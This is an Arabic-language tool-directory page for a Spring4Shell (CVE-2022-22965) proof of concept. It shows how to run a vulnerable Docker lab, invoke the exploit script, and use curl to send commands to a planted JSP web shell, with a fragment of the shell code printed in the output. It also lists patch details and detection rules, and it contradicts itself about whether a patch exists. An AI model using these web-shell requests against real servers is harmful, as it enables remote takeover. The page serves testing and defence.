Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
SpringShell — Spring4Shell - Spring Core RCE - CVE-2022-22965 | Kitploit
أدوات/GitHubGitHub/thegejr/springshell
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubthegejr/springshell

SpringShell

Spring4Shell - Spring Core RCE - CVE-2022-22965

عرض المستودع
131821منذ 4 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

ثغرة RCE في Spring Core - CVE-2022-22965

بعد Spring Cloud، في 29 مارس، ظهرت ثغرة أمنية أخرى ذات ثقل كبير لـ Spring على الإنترنت: Spring Core RCE

في 31 مارس أصدرت Spring إصدارات جديدة تعمل على إصلاح الثغرة. راجع القسم التصحيح.

في 31 مارس تم أخيرًا تعيين رقم CVE للثغرة بدرجة CVSS 9.8 (حرجة)

إثبات المفهوم

الاستغلال سهل الاستخدام للغاية، ومن هنا تأتي درجة CVSS العالية جدًا 9.8.

لاختبار الثغرة يمكنك القيام بما يلي.

قم بتشغيل صورة Docker ضعيفة لـ Spring.

root@kitploit:~
docker run -d -p 8082:8080 --name springrce -it vulfocus/spring-core-rce-2022-03-29

هذا يربط Spring الضعيفة بالعنوان localhost:8082.

تحقق من بدء تشغيل الصورة بشكل صحيح باستخدام curl

root@kitploit:~
curl http://localhost:8082

يجب أن يتم إرجاع استجابة ok.

لنستغل الصورة الضعيفة الآن!

root@kitploit:~
python3 exp.py --url http://localhost:8082

يجب أن يتم إرجاع استجابة The vulnerability exists .....

يمكنك الآن استغلال الثغرة باستخدام curl

root@kitploit:~
# Execute command whoami
curl --output - http://localhost:8082/tomcatwar.jsp?pwd=j&cmd=whoami

# Response has been truncated
root

//
- if("j".equals(request.getParameter("pwd"))){ java.io.InputStream in = -.getRuntime().exec(request.getParameter("cmd")).getInputStream(); int a = -1; byte[] b = new byte[2048]; while((a=in.read(b))!=-1){ out.println(new String(b)); } } - ........

# Execute command ls
curl --output - http://localhost:8082/tomcatwar.jsp?pwd=j&cmd=ls

# Response has been truncated
app
bin
dev
etc
..........

تداول إثبات المفهوم البرمجي

تم رفع الاستغلال حتى الآن exp.py
تداول إثبات المفهوم البرمجي
موقف محرج

التصحيح

أصدرت Spring الآن إصدارات جديدة تعالج هذه الثغرة (CVE). راجع إعلان Spring.

الـ commit الذي صحح الثغرة

تأثير الثغرة

  1. إصدار JDK 9 وما فوق
  2. استخدام Spring Framework أو أطر مستمدة منه

اقتراح إصلاح مؤقت

حاليًا، لم يصدر Spring تصحيحًا رسميًا بعد، يُنصح بتقليل إصدار JDK كحل مؤقت

الفريق الأزرق

Yara

  • Florian Roth - قذائف ويب Spring4Shell

Sigma

  • Emanuele De Lucia - إنشاء قذائف ويب .jsp

SPLUNK

  • Alex John - كشف SPL لـ Splunk
تنزيل الأداة